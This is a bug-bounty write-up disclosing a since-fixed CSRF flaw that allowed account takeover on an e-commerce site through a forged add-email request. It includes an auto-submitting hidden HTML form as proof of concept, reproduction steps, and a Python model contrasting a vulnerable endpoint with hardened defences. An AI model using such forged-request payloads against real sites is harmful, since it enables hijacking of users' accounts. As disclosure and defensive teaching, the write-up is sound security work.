Account Takeover of All Users by Adding a New Email (CSRF)

Hi All,

Company Info: is an English-Arabic language e-commerce platform, often described as the Amazon of the Middle East. It is the largest e-commerce platform in the Arab world. On March 28, 2017, Inc. confirmed it would be acquiring for $580 million.

Bug Category and reference links:
Cross-Site Request Forgery (CSRF)
link:

Technical Details of the Bug:
CSRF takes advantage of the fact that most web apps let an attacker predict every detail of a particular action: the endpoint, the method and the parameter names are the same for every user.
Because browsers attach credentials such as session cookies automatically, an attacker can host a page that submits a forged request which the server cannot distinguish from one the victim made on purpose.

Detection of CSRF flaws is fairly easy via penetration testing or code analysis: the check is whether each state-changing request carries something a cross-site page cannot supply (typically a per-session token that the server actually verifies). If the request can be replayed from another origin with nothing but the victim's cookies, the action is vulnerable.

About:
It was last September, when was a private program on HackerOne. I started working on it and found that the site was vulnerable to CSRF attacks on many different actions. This was one of the critical actions, which led to takeover of the account of any user of .

```html
<!-- action is the site's change-email endpoint (URL omitted in the original post) -->
<form action="" method="POST">
<input type="hidden" name="email" value="[Valid_email]">
<input type="submit">
</form>
<!-- submit automatically, so the victim only has to load the page -->
<script>document.forms[0].submit();</script>
```

Steps to reproduce:
1. Change the "email" POST parameter to any email address that has not already been registered.
2. Save the HTML above as a .html file and open it in a browser in which the victim is logged in to the site.
3. The email address on the victim's account will be changed.
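To make the technical-details paragraph and the steps above concrete, here is an added example (written for this post, not the site's code) that models the change-email endpoint server-side. The first handler trusts the session cookie alone, which is the condition the attacker's HTML exploits; the second adds an Origin check and a per-session synchronizer token, and the forged request is rejected by both. All names (`Request`, `SITE_ORIGIN`, the cookie value, the handler names) are hypothetical and the fixtures are constructed.

```python
import hmac
import secrets
from dataclasses import dataclass, field

# Constructed model of an "add/change email" endpoint. Every name here is hypothetical.
SITE_ORIGIN = "https://shop.example"   # assumed origin of the vulnerable site
VICTIM_COOKIE = "sid-victim-123"       # constructed session cookie value


@dataclass
class Request:
    method: str
    cookies: dict
    form: dict
    headers: dict = field(default_factory=dict)


def fresh_state():
    """Server-side session store and account table (constructed fixtures)."""
    sessions = {VICTIM_COOKIE: {"user": "victim", "csrf_token": secrets.token_hex(16)}}
    accounts = {"victim": {"emails": ["victim@example.com"]}}
    return sessions, accounts


def change_email_vulnerable(req, sessions, accounts):
    """The bug class in the write-up: a valid session cookie is the only check,
    and the browser attaches that cookie to the attacker's forged POST as well."""
    sess = sessions.get(req.cookies.get("session"))
    if req.method != "POST" or sess is None:
        return 403
    accounts[sess["user"]]["emails"].append(req.form["email"])
    return 200


def change_email_hardened(req, sessions, accounts):
    """Same endpoint with two independent CSRF defences."""
    sess = sessions.get(req.cookies.get("session"))
    if req.method != "POST" or sess is None:
        return 403
    # Defence 1: Origin header. Browsers add it to cross-site form POSTs and a page
    # on attacker.example cannot remove or rewrite it.
    origin = req.headers.get("Origin")
    if origin is not None and origin != SITE_ORIGIN:
        return 403
    # Defence 2: synchronizer token. The site's own form embeds the per-session
    # secret as a hidden input; the attacker's page cannot read it (same-origin
    # policy), so the forged POST arrives without it. compare_digest avoids a
    # timing side channel on the comparison.
    token = req.form.get("csrf_token", "")
    if not hmac.compare_digest(token, sess["csrf_token"]):
        return 403
    accounts[sess["user"]]["emails"].append(req.form["email"])
    return 200


def forged_request():
    """What the victim's browser sends after loading the attacker's HTML:
    the site's cookie is attached automatically, but no token and a foreign Origin."""
    return Request(
        method="POST",
        cookies={"session": VICTIM_COOKIE},
        form={"email": "attacker@evil.example"},
        headers={"Origin": "https://attacker.example"},
    )


def legitimate_request(sessions):
    """The same POST made from the site's own page, which carries the token."""
    return Request(
        method="POST",
        cookies={"session": VICTIM_COOKIE},
        form={"email": "new@example.com",
              "csrf_token": sessions[VICTIM_COOKIE]["csrf_token"]},
        headers={"Origin": SITE_ORIGIN},
    )


def run_demo():
    """Runs the forged and legitimate requests against both handlers and
    returns the status codes plus the final email list on the victim account."""
    sessions, accounts = fresh_state()
    results = {
        "vulnerable_forged": change_email_vulnerable(forged_request(), sessions, accounts),
        "hardened_forged": change_email_hardened(forged_request(), sessions, accounts),
        "hardened_legit": change_email_hardened(legitimate_request(sessions), sessions, accounts),
    }
    results["victim_emails"] = list(accounts["victim"]["emails"])
    return results


if __name__ == "__main__":
    for name, value in run_demo().items():
        print(name, value)
```

The forged request fails the hardened handler on the Origin check first, and would still fail on the token check if Origin were absent. Marking the session cookie `SameSite=Lax` is a third, browser-side layer that also stops this particular attack, since Lax cookies are not sent on cross-site POST navigations; it does not replace the server-side token, because older browsers and some cross-site flows do not honour it.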

Browser and Versions:
Google Chrome
Version: 52.0.2743.116

Impact:
If the attacker can add a new email address to the victim's account, they can go to the forgot-password page and request a reset for the newly added address. Because the reset link is delivered to any address attached to the account, it lands in the attacker's own mailbox; the attacker then sets a new password and takes over the victim's account.

Timeline:
September 4th: Report sent to the security team through HackerOne
September 28th: Report triaged by the team
September 30th: $1000 bounty rewarded
Feb 2nd: The issue was resolved

I would like to thank the team for fixing this serious issue.
Please feel free to comment if you have any questions regarding this issue.

Thanks!
Vijay Kumar

